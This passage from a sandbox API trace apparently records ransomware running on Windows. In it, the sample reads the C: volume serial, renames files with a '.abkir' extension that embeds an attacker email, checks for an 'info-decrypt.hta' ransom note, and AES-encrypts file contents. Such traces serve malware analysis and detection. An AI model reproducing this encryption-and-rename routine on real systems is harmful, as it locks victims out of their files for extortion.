ppvObject=0x6d8ead4*=0x60277d0) returned 0x0 [0196.129] WbemLocator:IUnknown:AddRef (This=0x60277d0) returned 0x3 [0196.129] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x2 [0196.129] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0196.129] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0196.129] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.129] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x60275f0) returned 0x0 [0196.129] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60275f0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x60334d4) returned 0x0 [0196.768] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5af54) returned 0x0 [0196.769] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5af54, pProxy=0x60334d4, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0196.769] WbemLocator:IUnknown:Release (This=0xb5af54) returned 0x1 [0196.769] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5af74) returned 0x0 [0196.769] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5af54) returned 0x0 [0196.769] WbemLocator:IClientSecurity:SetBlanket (This=0xb5af54, pProxy=0x60334d4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0196.769] WbemLocator:IUnknown:Release (This=0xb5af54) returned 0x2 [0196.769] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x1 [0196.769] CoTaskMemFree (pv=0xb59088) [0196.769] WbemLocator:IUnknown:Release (This=0x60275f0) returned 0x0 [0196.769] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5af74) returned 0x0 [0196.770] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0196.770] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0196.770] WbemLocator:IUnknown:AddRef (This=0xb5af74) returned 0x3 [0196.770] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0196.771] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0196.771] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5aed4) returned 0x0 [0196.771] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5aed4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.771] WbemLocator:IUnknown:Release (This=0xb5aed4) returned 0x3 [0196.771] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0196.771] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0196.771] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5af5c) returned 0x0 [0196.771] WbemLocator:IRpcOptions:Query (in: This=0xb5af5c, pPrx=0xb5af74, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0196.771] WbemLocator:IUnknown:Release (This=0xb5af5c) returned 0x3 [0196.771] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x2 [0196.771] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0196.771] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0196.772] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x60334d4) returned 0x0 [0196.772] WbemLocator:IUnknown:AddRef (This=0x60334d4) returned 0x4 [0196.772] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x3 [0196.772] WbemLocator:IUnknown:Release (This=0x60334d4) returned 0x2 [0196.772] SysStringLen (param_1=0x0) returned 0x0 [0196.772] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0196.772] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0196.772] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.772] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0196.772] WbemLocator:IUnknown:AddRef (This=0xb5af74) returned 0x3 [0196.772] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5af74) returned 0x0 [0196.772] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x3 [0196.772] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x2 [0196.772] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0196.772] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.772] IWbemServices:GetObject (in: This=0x60334d4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x6028b10, ppCallResult=0x0) returned 0x0 [0196.898] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60309b0, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0196.898] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0196.898] WbemDefPath:IWbemPath:GetText (in: This=0x60309b0, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.898] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3738e60*=0, plFlavor=0x3738e64*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3738e60*=8, plFlavor=0x3738e64*=0) returned 0x0 [0196.898] SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.898] SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.898] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3738e60*=8, plFlavor=0x3738e64*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3738e60*=8, plFlavor=0x3738e64*=0) returned 0x0 [0196.898] SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.898] SysStringByteLen (bstr="9C354B42") returned 0x10 [0196.898] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", lpFilePart=0x0) returned 0x43 [0196.898] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x66 [0196.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0196.898] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2e9d1d60, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0196.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0196.899] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0196.899] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", lpFilePart=0x0) returned 0x3d [0196.899] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\info-decrypt.hta", lpFilePart=0x0) returned 0x47 [0196.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0196.899] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e3de660, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x2e3de660, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x2e3de660, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0196.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0196.900] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", lpFilePart=0x0) returned 0x3d [0196.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0196.900] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), fInfoLevelId=0x0, lpFileInformation=0x37395a8 | out: lpFileInformation=0x37395a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x42d)) returned 1 [0196.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0196.901] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", lpFilePart=0x0) returned 0x3d [0196.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0196.901] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0196.901] GetFileType (hFile=0x4e0) returned 0x1 [0196.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0196.901] GetFileType (hFile=0x4e0) returned 0x1 [0196.901] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x42d [0196.901] ReadFile (in: hFile=0x4e0, lpBuffer=0x3739bbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x3739bbc*, lpNumberOfBytesRead=0x6d8edac*=0x42d, lpOverlapped=0x0) returned 1 [0196.908] CloseHandle (hObject=0x4e0) returned 1 [0196.909] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0x66bc148) returned 1 [0196.909] CryptGenRandom (in: hProv=0x66bc148, dwLen=0x10, pbBuffer=0x37e6fbc | out: pbBuffer=0x37e6fbc) returned 1 [0197.964] CryptImportKey (in: hProv=0x66bc148, pbData=0x36c74cc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f7d0) returned 1 [0197.964] CryptContextAddRef (hProv=0x66bc148, pdwReserved=0x0, dwFlags=0x0) returned 1 [0197.964] CryptContextAddRef (hProv=0x66bc148, pdwReserved=0x0, dwFlags=0x0) returned 1 [0197.964] CryptDuplicateKey (in: hKey=0xb7f7d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f850) returned 1 [0197.964] CryptContextAddRef (hProv=0x66bc148, pdwReserved=0x0, dwFlags=0x0) returned 1 [0197.964] CryptSetKeyParam (hKey=0xb7f850, dwParam=0x4, pbData=0x36c75ac*=0x1, dwFlags=0x0) returned 1 [0197.964] CryptSetKeyParam (hKey=0xb7f850, dwParam=0x1, pbData=0x36c7578, dwFlags=0x0) returned 1 [0197.964] CryptEncrypt (in: hKey=0xb7f850, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36c75bc*, pdwDataLen=0x6d8ed78*=0x430, dwBufLen=0x430 | out: pbData=0x36c75bc*, pdwDataLen=0x6d8ed78*=0x430) returned 1 [0197.964] CryptEncrypt (in: hKey=0xb7f850, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36c7a10*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x36c7a10*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0197.965] CryptDestroyKey (hKey=0xb7f7d0) returned 1 [0197.965] CryptReleaseContext (hProv=0x66bc148, dwFlags=0x0) returned 1 [0197.965] CryptReleaseContext (hProv=0x66bc148, dwFlags=0x0) returned 1 [0197.965] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", lpFilePart=0x0) returned 0x3d [0197.966] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0197.966] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0197.967] GetFileType (hFile=0x31c) returned 0x1 [0197.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0197.967] GetFileType (hFile=0x31c) returned 0x1 [0197.967] WriteFile (in: hFile=0x31c, lpBuffer=0x36c8018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x36c8018*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0197.968] CloseHandle (hObject=0x31c) returned 1 [0197.968] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0197.968] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0197.968] CoTaskMemFree (pv=0xbed438) [0197.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0197.968] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0197.968] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0197.968] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0197.968] IUnknown:Release (This=0xb51e34) returned 0x1 [0197.969] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x6027900) returned 0x0 [0197.969] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027900, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0197.969] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027900, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6029d50) returned 0x0 [0197.969] WbemDefPath:IUnknown:Release (This=0x6027900) returned 0x0 [0197.969] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029d50, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6029d50) returned 0x0 [0197.969] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029d50, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0197.970] WbemDefPath:IUnknown:AddRef (This=0x6029d50) returned 0x3 [0197.970] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029d50, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0197.970] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029d50, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0197.970] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029d50, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0x66ccb88) returned 0x0 [0197.970] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccb88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.970] WbemDefPath:IUnknown:Release (This=0x66ccb88) returned 0x3 [0197.970] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0197.970] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0197.970] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029d50, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, 